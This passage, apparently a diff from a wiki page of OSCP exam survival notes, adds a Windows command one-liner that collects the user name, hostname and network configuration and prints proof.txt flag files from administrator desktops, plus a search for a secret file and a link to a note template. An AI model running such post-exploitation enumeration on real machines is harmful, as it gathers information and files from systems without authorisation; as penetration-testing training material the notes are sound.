 +echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> nul 
 +dir /s /b network-secret.txt 
 +</code> 
 + 
 + 
 +**Note template** 
 +<code>
 To work fast use CherryTree to take notes and use this template : To work fast use CherryTree to take notes and use this template :
 https://ceso.github.io/files/oscp/template_pwk.ctb https://ceso.github.io/files/oscp/template_pwk.ctb
 +</code>
  
oscp_survival_guide.1612641391.txt.gz · Dernière modification: 2021/02/06 20:56 par M0N5T3R